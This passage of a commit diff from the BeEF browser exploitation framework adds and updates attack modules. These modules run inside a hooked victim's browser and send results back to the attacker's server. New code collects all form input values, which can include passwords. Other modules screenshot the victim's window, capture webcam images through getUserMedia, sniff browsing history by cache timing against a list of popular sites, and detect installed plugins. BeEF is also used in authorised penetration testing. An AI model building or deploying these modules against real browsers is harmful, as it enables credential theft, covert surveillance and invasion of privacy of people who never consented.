} else if ( navigator.mimeTypes && navigator.mimeTypes["application/vnd.unity"] ) {
if ( navigator.mimeTypes["application/vnd.unity"].enabledPlugin &&
navigator.plugins &&
navigator.plugins["Unity Player"] ) {
return true;
}
}
return false;
}
if ( hasUnity() ) {
beef.net.send("<%= @command_url %>", <%= @command_id %>, "unity = Unity Web Player is enabled");
if ( !beef.browser.isIE() ) {
var unityRegex = /Unity Web Player version (.*). \(c\)/g;
var match = unityRegex.exec(navigator.plugins["Unity Player"].description);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "unity version = "+ match[1]);
}
} else {
beef.net.send("<%= @command_url %>", <%= @command_id %>, "unity = Unity Web Player is not enabled");
}
});

15
modules/browser/detect_unity/config.yaml Normal file
View File

@@ -0,0 +1,15 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
Detect_unity:
enable: true
category: "Browser"
name: "Detect Unity Web Player"
description: "Detects Unity Web Player."
authors: ["gcattani"]
target:
working: ["All"]

14
modules/browser/detect_unity/module.rb Normal file
View File

@@ -0,0 +1,14 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Detect_unity < BeEF::Core::Command
def post_execute
content = {}
content['unity'] = @datastore['unity']
save content
end
end

147
modules/browser/get_visited_domains/command.js
View File

@@ -133,7 +133,7 @@ if (beef.browser.isIE() == 1) {
var MAX_ATTEMPTS = 1;
}
if (beef.browser.isC() == 1 || beef.browser.isO() == 1){
if (beef.browser.isO() == 1){
/****************
* SCANNED URLS *
****************/
@@ -212,7 +212,7 @@ function perform_check() {
if (beef.browser.isFF() == 1) {
setTimeout(wait_for_read, 1);
}
if(beef.browser.isC() == 1 || beef.browser.isO() == 1){
if(beef.browser.isO() == 1){
setTimeout(wait_for_read, 1);
}
}
@@ -242,11 +242,10 @@ function wait_for_read() {
setTimeout(wait_for_read, 0);
}
}
if (beef.browser.isC() == 1 || beef.browser.isO() == 1){
if (beef.browser.isO() == 1){
try{
if(frames['f'].location.href != 'about:blank'){
throw 1;
}
if(frames['f'].location.href != 'about:blank') throw 1;
frames['f'].stop();
document.getElementById('f').src = 'javascript:"<body onload=\'parent.frame_ready = true\'>"';
@@ -280,7 +279,7 @@ function navigate_to_target() {
if (beef.browser.isIE() == 1) {
setTimeout(wait_for_noread, 0);
}
if (beef.browser.isC() == 1 || beef.browser.isO() == 1){
if (beef.browser.isO() == 1){
setTimeout(wait_for_noread, 1);
}
urls++;
@@ -318,7 +317,7 @@ function wait_for_noread() {
}
sched_call(wait_for_noread);
}
if (beef.browser.isC() == 1 || beef.browser.isO() == 1){
if (beef.browser.isO() == 1){
if (frames['f'].location.href == undefined){
confirm_visited = true;
throw 1;
@@ -343,7 +342,7 @@ function maybe_test_next() {
if (beef.browser.isIE() == 1) {
document.getElementById("f").src = 'about:blank';
}
if (beef.browser.isC() == 1 || beef.browser.isO() == 1) {
if (beef.browser.isO() == 1) {
document.getElementById('f').src = 'about:blank';
}
if (target_off < targets.length) {
@@ -396,7 +395,7 @@ function reload(){
/* The handler for "run the test" button on the main page. Dispenses
advice, resets state if necessary. */
function start_stuff() {
if (beef.browser.isFF() == 1 || beef.browser.isIE() == 1 || beef.browser.isC() == 1 || beef.browser.isO() == 1) {
if (beef.browser.isFF() == 1 || beef.browser.isIE() == 1 || beef.browser.isO() == 1) {
target_off = 0;
attempt = 0;
confirmed_visited = false;
@@ -409,11 +408,139 @@ function start_stuff() {
}
}
/**************/
/***Visipisi***/
/**************/
var vp_result = {};
var visipisi = {
webkit: function(url, cb) {
var start;
var loaded = false;
var runtest = function() {
window.removeEventListener("message", runtest, false);
var img = new Image();
start = new Date().getTime();
try{
img.src = url;
} catch(e) {}
var messageCB = function (e){
var now = new Date().getTime();
if (img.complete) {
delete img;
window.removeEventListener("message", messageCB, false);
cbWrap(true);
} else if (now - start > 10) {
delete img;
if (window.stop !== undefined)
window.stop();
else
document.execCommand("Stop",false);
window.removeEventListener("message", messageCB, false);
cbWrap(false);
} else {
window.postMessage('','*');
}
};
window.addEventListener("message", messageCB, false);
window.postMessage('','*');
};
cbWrap = function (value) {cb(value);};
window.addEventListener("message", runtest, false);
window.postMessage('','*');
}
};
function visipisiCB(vp, endCB, sites, urls, site, result){
if(result === null){
vp_result[site] = 'Whoops';
}
else{
vp_result[site] = result ? 'visited' : 'not visited';
}
var next_site = sites.pop();
if(next_site)
vp( urls[next_site], function (result) {
visipisiCB(vp, endCB, sites, urls, next_site, result);
});
else
endCB();
}
function getVisitedDomains(){
var tests = {
facebook: 'https://s-static.ak.facebook.com/rsrc.php/v1/yJ/r/vOykDL15P0R.png',
twitter: 'https://twitter.com/images/spinner.gif',
digg: 'http://cdn2.diggstatic.com/img/sprites/global.5b25823e.png',
reddit: 'http://www.redditstatic.com/sprite-reddit.pZL22qP4ous.png',
hn: 'http://ycombinator.com/images/y18.gif',
stumbleupon: 'http://cdn.stumble-upon.com/i/bg/logo_su.png',
wired: 'http://www.wired.com/images/home/wired_logo.gif',
xkcd: 'http://imgs.xkcd.com/s/9be30a7.png',
linkedin: 'http://static01.linkedin.com/scds/common/u/img/sprite/sprite_global_v6.png',
slashdot: 'http://a.fsdn.com/sd/logo_w_l.png',
myspace: 'http://cms.myspacecdn.com/cms/x/11/47/title-WhatsHotWhite.jpg',
engadget: 'http://www.blogsmithmedia.com/www.engadget.com/media/engadget_logo.png',
lastfm: 'http://cdn.lst.fm/flatness/anonhome/1/anon-sprite.png',
pandora: 'http://www.pandora.com/img/logo.png',
youtube: 'http://s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif',
yahoo: 'http://l.yimg.com/ao/i/mp/properties/frontpage/01/img/aufrontpage-sprite.s1740.gif',
google: 'https://www.google.com/intl/en_com/images/srpr/logo3w.png',
hotmail: 'https://secure.shared.live.com/~Live.SiteContent.ID/~16.2.8/~/~/~/~/images/iconmap.png',
cnn: 'http://i.cdn.turner.com/cnn/.element/img/3.0/global/header/intl/hdr-globe-central.gif',
bbc: 'http://static.bbc.co.uk/frameworks/barlesque/1.21.2/desktop/3/img/blocks/light.png',
reuters: 'http://www.reuters.com/resources_v2/images/masthead-logo.gif',
wikipedia: 'http://upload.wikimedia.org/wikipedia/en/b/bc/Wiki.png',
amazon: 'http://g-ecx.images-amazon.com/images/G/01/gno/images/orangeBlue/navPackedSprites-US-22._V183711641_.png',
ebay: 'http://p.ebaystatic.com/aw/pics/au/logos/logoEbay_x45.gif',
newegg: 'http://images10.newegg.com/WebResource/Themes/2005/Nest/neLogo.png',
bestbuy: 'http://images.bestbuy.com/BestBuy_US/en_US/images/global/header/hdr_logo.gif',
walmart: 'http://i2.walmartimages.com/i/header_wide/walmart_logo_214x54.gif',
perfectgirls: 'http://www.perfectgirls.net/img/logoPG_02.jpg',
abebooks: 'http://www.abebooks.com/images/HeaderFooter/siteRevamp/AbeBooks-logo.gif',
msy: 'http://msy.com.au/images/MSYLogo-long.gif',
techbuy: 'http://www.techbuy.com.au/themes/default/images/tblogo.jpg',
borders: 'http://www.borders.com.au/images/ui/logo-site-footer.gif',
mozilla: 'http://www.mozilla.org/images/template/screen/logo_footer.png',
anandtech: 'http://www.anandtech.com/content/images/globals/header_logo.png',
tomshardware: 'http://m.bestofmedia.com/i/tomshardware/v3/logo_th.png',
shopbot: 'http://i.shopbot.com.au/s/i/logo/en_AU/shopbot.gif',
staticice: 'http://staticice.com.au/images/banner.jpg',
};
var sites = [];
for (var k in tests)
sites.push(k);
sites.reverse();
vp = visipisi.webkit;
var first_site = sites.pop();
var end = function() {
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results='+prepResult(vp_result));
}
vp(tests[first_site], function(result) {
visipisiCB(vp, end, sites, tests, first_site, result);
});
}
function prepResult(results){
var result_str ='<br>';
for(r in results){
result_str += r + ':' + results[r]+'<br>';
}
return result_str;
}
beef.execute(function() {
if(beef.browser.isC() == 1){
getVisitedDomains();
} else {
urls = undefined;
exec_next = null;
start_stuff();
}
});

2
modules/browser/get_visited_domains/config.yaml
View File

@@ -10,7 +10,7 @@ beef:
category: "Browser"
name: "Get Visited Domains"
description: "This module will retrieve rapid history extraction through non-destructive cache timing.\nBased on work done by Michal Zalewski at http://lcamtuf.coredump.cx/cachetime/"
authors: ["@keith55", "quentin"]
authors: ["@keith55", "oxplot", "quentin"]
target:
working: ["FF", "IE", "O"]
not_working: ["C", "S"]

3
modules/browser/hooked_domain/deface_web_page/module.rb
View File

@@ -7,7 +7,8 @@ class Deface_web_page < BeEF::Core::Command
def self.options
configuration = BeEF::Core::Configuration.instance
favicon_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/ui/media/images/favicon.ico"
proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
favicon_uri = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/ui/media/images/favicon.ico"
return [
{ 'name' => 'deface_title', 'description' => 'Page Title', 'ui_label' => 'New Title', 'value' => 'BeEF - The Browser Exploitation Framework Project', 'width'=>'200px' },
{ 'name' => 'deface_favicon', 'description' => 'Shortcut Icon', 'ui_label' => 'New Favicon', 'value' => favicon_uri, 'width'=>'200px' },

2
modules/browser/hooked_domain/deface_web_page_component/config.yaml
View File

@@ -10,6 +10,6 @@ beef:
category: ["Browser", "Hooked Domain"]
name: "Replace Component (Deface)"
description: "Overwrite a particular component of the hooked page."
authors: ["antisnatchor","xntrik"]
authors: ["antisnatchor", "xntrik"]
target:
user_notify: ['ALL']

28
modules/browser/hooked_domain/get_form_values/command.js Normal file
View File

@@ -0,0 +1,28 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var form_data = new Array();
// loop through all forms
for (var f=0; f < document.forms.length; f++) {
// store type,name,value for all input fields
for (var i=0; i < document.forms[f].elements.length; i++) {
form_data.push(new Array(document.forms[f].elements[i].type, document.forms[f].elements[i].name, document.forms[f].elements[i].value));
}
}
// return form data
if (form_data.length) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+JSON.stringify(form_data));
// return if no input fields were found
} else {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Could not find any forms on '+window.location);
}
});

8
modules/exploits/zenoss_daemon_csrf/config.yaml → modules/browser/hooked_domain/get_form_values/config.yaml
View File

@@ -5,11 +5,11 @@
#
beef:
module:
zenoss_daemon_csrf:
get_form_values:
enable: true
category: "Exploits"
name: "Zenoss 3.x Daemon CSRF"
description: "Attempts to start/stop/restart daemons on a Zenoss Core 3.x server."
category: ["Browser", "Hooked Domain"]
name: "Get Form Values"
description: "This module retrieves the name, type, and value of all input fields for all forms on the page."
authors: ["bcoles"]
target:
working: ["ALL"]

14
modules/browser/hooked_domain/get_form_values/module.rb Normal file
View File

@@ -0,0 +1,14 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Get_form_values < BeEF::Core::Command
def post_execute
content = {}
content['form_data'] = @datastore['form_data']
save content
end
end

13
modules/browser/hooked_domain/get_page_html/command.js
View File

@@ -6,18 +6,7 @@
beef.execute(function() {
try {
var html_head = document.head.innerHTML.toString();
} catch (e) {
var html_head = "Error: document has no head";
}
try {
var html_body = document.body.innerHTML.toString();
} catch (e) {
var html_body = "Error: document has no body";
}
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'head='+html_head+'&body='+html_body);
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'head='+beef.browser.getPageHead()+'&body='+beef.browser.getPageBody());
});

3
modules/browser/hooked_domain/get_stored_credentials/module.rb
View File

@@ -7,7 +7,8 @@ class Get_stored_credentials < BeEF::Core::Command
def self.options
configuration = BeEF::Core::Configuration.instance
uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/butcher/index.html"
proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
uri = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/butcher/index.html"
return [
{ 'name' => 'login_url', 'description' => 'Login URL', 'ui_label' => 'Login URL', 'value' => uri, 'width'=>'400px' }
]

3
modules/browser/hooked_domain/site_redirect_iframe/module.rb
View File

@@ -7,7 +7,8 @@ class Site_redirect_iframe < BeEF::Core::Command
def self.options
configuration = BeEF::Core::Configuration.instance
favicon_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/ui/media/images/favicon.ico"
proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
favicon_uri = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/ui/media/images/favicon.ico"
return [
{ 'name' => 'iframe_title', 'description' => 'Title of the iFrame', 'ui_label' => 'New Title', 'value' => 'BeEF - The Browser Exploitation Framework Project', 'width'=>'200px' },
{ 'name' => 'iframe_favicon', 'description' => 'Shortcut Icon', 'ui_label' => 'New Favicon', 'value' => favicon_uri, 'width'=>'200px' },

3
modules/browser/play_sound/module.rb
View File

@@ -9,8 +9,9 @@ class Play_sound < BeEF::Core::Command
def self.options
configuration = BeEF::Core::Configuration.instance
proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
sound_file_url = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/sound.wav"
sound_file_url = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/sound.wav"
return [{
'name' => 'sound_file_uri',

22
modules/browser/spyder_eye/command.js Normal file
View File

@@ -0,0 +1,22 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var script = document.createElement( 'script' );
script.type = 'text/javascript';
script.src = beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/html2canvas.js';
$j("body").append( script );
html2canvas(document.body, {
onrendered: function(canvas) {
var img = canvas.toDataURL("image/png");
beef.net.send("<%= @command_url %>", <%= @command_id %>, "image="+img);
//beef.net.send("<%= @command_url %>", <%= @command_id %>, "image=All done");
}
});
});

31
modules/browser/spyder_eye/config.yaml Normal file
View File

@@ -0,0 +1,31 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
spyder_eye:
enable: true
category: "Browser"
name: "Spyder Eye"
description: "This module takes a picture of the victim's browser window."
authors: ["preth00nker"]
target:
working:
IE:
min_ver: 9
max_ver: latest
FF:
min_ver: 3
max_ver: latest
C:
min_ver: 1
max_ver: latest
S:
min_ver: 6
max_ver: latest
O:
min_ver: 12
max_ver: latest
not_working: ["All"]

2841
modules/browser/spyder_eye/html2canvas.js Normal file
View File

File diff suppressed because it is too large Load Diff

35
modules/browser/spyder_eye/module.rb Normal file
View File

@@ -0,0 +1,35 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Spyder_eye < BeEF::Core::Command
require 'base64'
def pre_send
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/spyder_eye/html2canvas.js', '/html2canvas', 'js')
end
def post_execute
content = {}
content['results'] = @datastore['results'] if not @datastore['results'].nil?
save content
# save screenshot file
begin
filename = "screenshot_#{Integer(@datastore['cid'])}.png"
File.open(filename, 'wb') do |file|
data = @datastore['results'].gsub(/^image=data:image\/(png|jpg);base64,/, "")
file.write(Base64.decode64(data))
end
print_info("Browser screenshot saved to '#{filename}'")
BeEF::Core::Logger.instance.register("Zombie", "Browser screenshot saved to '#{filename}'")
rescue Exception => e
print_error("Could not write screenshot file '#{filename}' - Exception: #{e.message}")
end
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/html2canvas.js')
end
end

6
modules/browser/webcam/command.js
View File

@@ -22,7 +22,7 @@ beef.execute(function() {
//These 4 function names [noCamera(), noCamera(), pressedDisallow(), pictureCallback(picture), allPicturesTaken()] are hard coded in the swf actionscript3. Flash will invoke these functions directly. The picture for the pictureCallback function will be a base64 encoded JPG string
var js_functions = '<script>function noCamera() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=The user has no camera"); }; function pressedAllow() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=User pressed allow, you should get pictures soon"); }; function pressedDisallow() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=User pressed disallow, you won\'t get pictures"); }; function pictureCallback(picture) { beef.net.send("<%= @command_url %>", <%= @command_id %>, "picture="+picture); }; function allPicturesTaken(){ }';
var js_functions = '<script>function noCamera() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=The user has no camera"); }; function pressedAllow() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=User pressed allow, you should get pictures soon"); }; function pressedDisallow() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=User pressed disallow, you won\'t get pictures"); }; function pictureCallback(picture) { beef.net.send("<%= @command_url %>", <%= @command_id %>, "image="+picture); }; function allPicturesTaken(){ }';
//This function is called by swfobject, if if fails to add the flash file to the page
@@ -43,10 +43,10 @@ beef.execute(function() {
theHead.appendChild(style);
//A nice library that helps us to include the swf file
var swfobject_script = '<script type="text/javascript" src="http://'+beef.net.host+':'+beef.net.port+'/swfobject.js"></script>'
var swfobject_script = '<script type="text/javascript" src="'+beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/swfobject.js"></script>'
//This is the javascript that actually calls the swfobject library to include the swf file
var include_script = '<script>var flashvars = {\'no_of_pictures\':\'<%= @no_of_pictures %>\', \'interval\':\'<%= @interval %>\'}; var parameters = {}; parameters.scale = "noscale"; parameters.wmode = "opaque"; parameters.allowFullScreen = "true"; parameters.allowScriptAccess = "always"; var attributes = {}; swfobject.embedSWF("http://'+beef.net.host+':'+beef.net.port+'/takeit.swf", "main", "403", "345", "9", "expressInstall.swf", flashvars, parameters, attributes, swfobjectCallback);</script>';
var include_script = '<script>var flashvars = {\'no_of_pictures\':\'<%= @no_of_pictures %>\', \'interval\':\'<%= @interval %>\'}; var parameters = {}; parameters.scale = "noscale"; parameters.wmode = "opaque"; parameters.allowFullScreen = "true"; parameters.allowScriptAccess = "always"; var attributes = {}; swfobject.embedSWF("'+beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/takeit.swf", "main", "403", "345", "9", "expressInstall.swf", flashvars, parameters, attributes, swfobjectCallback);</script>';
//Empty body first
$j('body').html('');

50
modules/browser/webcam_html5/command.js Normal file
View File

@@ -0,0 +1,50 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var vid_id = beef.dom.generateID();
var can_id = beef.dom.generateID();
var vid_el = beef.dom.createElement('video',{'id':vid_id,'style':'display:none;','autoplay':'true'});
var can_el = beef.dom.createElement('canvas',{'id':can_id,'style':'display:none;','width':'640','height':'480'});
$j('body').append(vid_el);
$j('body').append(can_el);
var ctx = can_el.getContext('2d');
var localMediaStream = null;
var cap = function() {
if (localMediaStream) {
ctx.drawImage(vid_el,0,0);
beef.net.send("<%= @command_url %>",<%= @command_id %>, 'image='+can_el.toDataURL('image/png'));
} else {
beef.net.send("<%= @command_url %>",<%= @command_id %>, 'result=something went wrong');
}
}
window.URL = window.URL || window.webkitURL;
navigator.getUserMedia = navigator.getUserMedia || navigator.webkitGetUserMedia || navigator.mozGetUserMedia || navigator.msGetUserMedia;
navigator.getUserMedia({video:true},function(stream) {
vid_el.src = window.URL.createObjectURL(stream);
localMediaStream = stream;
setTimeout(cap,2000);
}, function(err) {
beef.net.send("<%= @command_url %>",<%= @command_id %>, 'result=getUserMedia call failed');
});
});

Some files were not shown because too many files have changed in this diff Show More